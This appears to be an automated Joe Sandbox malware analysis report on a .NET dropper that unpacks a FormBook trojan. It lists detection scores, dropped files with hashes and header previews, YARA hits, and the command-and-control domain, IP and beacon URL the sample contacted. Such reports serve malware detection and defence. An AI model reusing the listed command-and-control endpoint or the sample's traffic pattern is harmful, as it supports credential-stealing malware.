            C:\Users\user\AppData\Local\Temp\New_1007572_021.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe5%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe2%ReversingLabs
            C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe49%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe86%ReversingLabsWin32.Trojan.FormBook
            C:\Users\user\AppData\Local\Temp\New_1007572_021.exe28%ReversingLabsByteCode-MSIL.Spyware.Noon

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            0.2.New_1007572_021.exe.2d49d5c.1.unpack100%AviraTR/Dropper.GenDownload File
            0.2.New_1007572_021.exe.3eb8b30.6.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
            10.2.FB_5E87.tmp.exe.1080000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            10.1.FB_5E87.tmp.exe.1080000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            10.0.FB_5E87.tmp.exe.1080000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            8.2.New_1007572_021.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            0.2.New_1007572_021.exe.3bc9930.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.fontbureau.comF0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.fontbureau.comiona0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.fontbureau.come.comE0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.comfsresidential.com/cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h0%Avira URL Cloudsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.comfsresidential.com
            		185.53.178.50
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.comfsresidential.com/cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6htrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.0New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                		high
                http://www.fontbureau.comNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designersGNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.comFNew_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/?New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bTheNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                        		high
                        http://www.tiro.comexplorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designersexplorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                          		high
                          http://www.goodfont.co.krNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.comionaNew_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.carterandcone.comlNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.sajatypeworks.comNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.typography.netDNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/cabarga.htmlNNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/cTheNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/staff/dennis.htmNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://fontfabrik.comNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cnNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/frere-user.htmlNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.come.comENew_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/DPleaseNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers8New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                                		high
                                http://www.%s.comPAexplorer.exe, 0000000B.00000000.785548112.0000000002B50000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                		low
                                http://www.fonts.comNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.sandoll.co.krNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.urwpp.deDPleaseNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.zhongyicts.com.cnNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sakkal.comNew_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.53.178.50
                                  		www.comfsresidential.comGermany
                                  		61969TEAMINTERNET-ASDEtrue

                                  Private

                                  IP
                                  192.168.2.1

                                  General Information

                                  Joe Sandbox Version:33.0.0 White Diamond
                                  Analysis ID:458848
                                  Start date:03.08.2021
                                  Start time:19:47:24
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 11m 32s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:New_1007572_021.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:22
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@11/5@1/2
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 61.7% (good quality ratio 54.7%)
                                  • Quality average: 69.1%
                                  • Quality standard deviation: 33.6%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 76
                                  • Number of non-executed functions: 131
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 52.114.77.33, 104.43.139.144, 104.43.193.48, 23.211.6.115, 40.88.32.150, 20.50.102.62, 20.54.110.249, 173.222.108.226, 173.222.108.210, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.210.154
                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, browser.events.data.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, skypedataprdcolneu04.cloudapp.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, browser.pipe.aria.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/458848/sample/New_1007572_021.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  185.53.178.50http://wwww.fgoogle.atGet hashmaliciousBrowse
                                  • wwww.fgoogle.at/favicon.ico

                                  Domains

                                  No context

                                  ASN

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  TEAMINTERNET-ASDErL3Wx4zKD4.exeGet hashmaliciousBrowse
                                  • 185.53.177.53
                                  Medical Equipment Order 2021.PDF.exeGet hashmaliciousBrowse
                                  • 185.53.179.90
                                  d9UdQnXQ86ld31G.exeGet hashmaliciousBrowse
                                  • 185.53.177.11
                                  YKqDUg3NxSA9bwZ.exeGet hashmaliciousBrowse
                                  • 185.53.178.11
                                  dl145cKtrs.exeGet hashmaliciousBrowse
                                  • 185.53.178.12
                                  PO 3457773.exeGet hashmaliciousBrowse
                                  • 185.53.177.14
                                  PO#JFUB0002 FOR NEW ORDER.exeGet hashmaliciousBrowse
                                  • 185.53.177.53
                                  Confirma PI#4042021 INVOICE.exeGet hashmaliciousBrowse
                                  • 185.53.177.53
                                  RFQ-2176 NEW PROJECT QUOTATION MAY.exeGet hashmaliciousBrowse
                                  • 185.53.177.11
                                  WXs8v9QuE7.exeGet hashmaliciousBrowse
                                  • 185.53.177.12
                                  KBzeB23bE1.exeGet hashmaliciousBrowse
                                  • 185.53.177.13
                                  xnuE49NGol.exeGet hashmaliciousBrowse
                                  • 185.53.177.11
                                  aVzUZCHkko.exeGet hashmaliciousBrowse
                                  • 185.53.177.11
                                  PO#310521.PDF.exeGet hashmaliciousBrowse
                                  • 185.53.178.10
                                  Scanned Specification Catalogue 7464.exeGet hashmaliciousBrowse
                                  • 185.53.177.52
                                  Ciikfddtznhxmtqufdujkifxwmwhrfjkcl_Signed_.exeGet hashmaliciousBrowse
                                  • 185.53.178.53
                                  $RAULIU9.exeGet hashmaliciousBrowse
                                  • 185.53.177.31
                                  350969bc_by_Libranalysis.exeGet hashmaliciousBrowse
                                  • 185.53.177.53
                                  GLqbDRKePPp16Zr.exeGet hashmaliciousBrowse
                                  • 185.53.177.12
                                  sample3.exeGet hashmaliciousBrowse
                                  • 185.53.177.12

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exeIMG_105_13_676_571.exeGet hashmaliciousBrowse
                                    SecuriteInfo.com.Trojan.DownloaderNET.151.21045.exeGet hashmaliciousBrowse
                                      4-1.docGet hashmaliciousBrowse
                                        Order Inqury-93-23-20.docGet hashmaliciousBrowse
                                          IMG_7189012.exeGet hashmaliciousBrowse
                                            SecuriteInfo.com.Trojan.GenericKD.45131634.12155.exeGet hashmaliciousBrowse
                                              77.docGet hashmaliciousBrowse
                                                qlvti.exeGet hashmaliciousBrowse
                                                  RFQ-220818.xlsGet hashmaliciousBrowse
                                                    RFQ-220818.xlsGet hashmaliciousBrowse

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New_1007572_021.exe.log
                                                      Process:C:\Users\user\Desktop\New_1007572_021.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1119
                                                      Entropy (8bit):5.356708753875314
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                      MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                      SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                      SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                      SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                      Malicious:true
                                                      Reputation:moderate, very likely benign file
                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                      C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe
                                                      Process:C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3072
                                                      Entropy (8bit):1.7089931293899303
                                                      Encrypted:false
                                                      SSDEEP:24:7U6Id6l1iWyyyyyyyyytrUUUUUUUUUUgro:oO
                                                      MD5:74BAFB3E707C7B0C63938AC200F99C7F
                                                      SHA1:10C5506337845ED9BF25C73D2506F9C15AB8E608
                                                      SHA-256:129450BA06AD589CF6846A455A5B6B5F55E164EE4906E409EB692AB465269689
                                                      SHA-512:5B24DC5ACD14F812658E832B587B60695FB16954FCA006C2C3A7382EF0EC65C3BD1AAF699425C49FF3CCEEF16869E75DD6F00EC189B9F673F08F7E1B80CF7781
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: Metadefender, Detection: 5%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                      Joe Sandbox View:
                                                      • Filename: IMG_105_13_676_571.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Trojan.DownloaderNET.151.21045.exe, Detection: malicious, Browse
                                                      • Filename: 4-1.doc, Detection: malicious, Browse
                                                      • Filename: Order Inqury-93-23-20.doc, Detection: malicious, Browse
                                                      • Filename: IMG_7189012.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Trojan.GenericKD.45131634.12155.exe, Detection: malicious, Browse
                                                      • Filename: 77.doc, Detection: malicious, Browse
                                                      • Filename: qlvti.exe, Detection: malicious, Browse
                                                      • Filename: RFQ-220818.xls, Detection: malicious, Browse
                                                      • Filename: RFQ-220818.xls, Detection: malicious, Browse
                                                      Reputation:moderate, very likely benign file
                                                      Preview: MZl.....................@.......Win32 Program!..$......!.L.!`...GoLink, GoAsm www.GoDevTool.com.PE..L....y.>..........................................@..........................0......C................................................ ..............................................................................................................code................................ ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe
                                                      Process:C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):186368
                                                      Entropy (8bit):7.314572114292142
                                                      Encrypted:false
                                                      SSDEEP:3072:4dqYxe9j7g+D8OwXoopyPS5O1lFqRKMhZ6L7Ne61PCbyl2:4kXh8OIoYyq5ILqRKMo7cFN
                                                      MD5:48ECE2CA39A9EAE7FCED7418CF071D46
                                                      SHA1:7570995CBF699088A8F208015CB2C92BE5BC837A
                                                      SHA-256:4119B29BC938578D5D243DB714D0619228D37C10CCAA52925F9E81A410720D59
                                                      SHA-512:E897FDED4B643054796E410CADCC348C1215C934FE70F5407E36E9F10E59E2B10B7EDCBB99D746709AEF8FF498D98D848ADA90FB477EA732A128EE138ED0FD3B
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: JPCERT/CC Incident Response Group
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: Metadefender, Detection: 49%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 86%
                                                      Preview: MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$............f..f..f......f......f......f.Rich.f.................PE..L.....N..........................................@.......................................@..........................................................................................................................................................text............................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
                                                      Process:C:\Users\user\Desktop\New_1007572_021.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):455168
                                                      Entropy (8bit):7.937198220453206
                                                      Encrypted:false
                                                      SSDEEP:12288:bHOWiWyFfGU94mxuYfv/PT9WK+dG7VWfQTB:bHQ4mF7ZBMfwB
                                                      MD5:41137FD61B9CC0D92225C91660A5902C
                                                      SHA1:15D023FD6D344CB18243469A3EE01FEA6BB189AF
                                                      SHA-256:B04306FA8223C20A1ABAAA6AEB5CABB2A83DC04337BEB2ACFD47784B34B682BC
                                                      SHA-512:E32EE01FD957EE49F6BFCEFF4BC58B8B695111EF7416F8487398CBFAFD16B2EEAE0B79C41A8071075FD4E09D584CB642393F9E1655A5D70AB3135ADDD2E7ECBA
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 28%
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ms)...............0......J........... ........@.. .......................`............@.................................@...K........F...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....F.......H..................@..@.reloc.......@......................@..B................p.......H........<...,......,....i..,\...........................................0..>........(.... ....~....:....&8....8........E........8.....(....8....*...s....o....*.0..}.......8m.......E....[.......8V....{....(....8....8....8......(.... ....~c...9....&8.....{....9.... ....~2...:....&8....*.:....8........0..........8........E............n.......8......(....8......(....8'...........s....(.... ....~K...9....&8..... .... ....s....(.... ....~t...:....&8y....r...p(....8.....(....8.....
                                                      C:\Users\user\AppData\Local\Temp\New_1007572_021.exe:Zone.Identifier
                                                      Process:C:\Users\user\Desktop\New_1007572_021.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview: [ZoneTransfer]....ZoneId=0

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.937198220453206
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:New_1007572_021.exe
                                                      File size:455168
                                                      MD5:41137fd61b9cc0d92225c91660a5902c
                                                      SHA1:15d023fd6d344cb18243469a3ee01fea6bb189af
                                                      SHA256:b04306fa8223c20a1abaaa6aeb5cabb2a83dc04337beb2acfd47784b34b682bc
                                                      SHA512:e32ee01fd957ee49f6bfceff4bc58b8b695111ef7416f8487398cbfafd16b2eeae0b79c41a8071075fd4e09d584cb642393f9e1655a5d70ab3135addd2e7ecba
                                                      SSDEEP:12288:bHOWiWyFfGU94mxuYfv/PT9WK+dG7VWfQTB:bHQ4mF7ZBMfwB
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ms)...............0......J........... ........@.. .......................`............@................................

                                                      File Icon

                                                      Icon Hash:888c9abc8c8ad8d8

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x46c58e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0xDF29736D [Sun Aug 22 17:54:53 2088 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
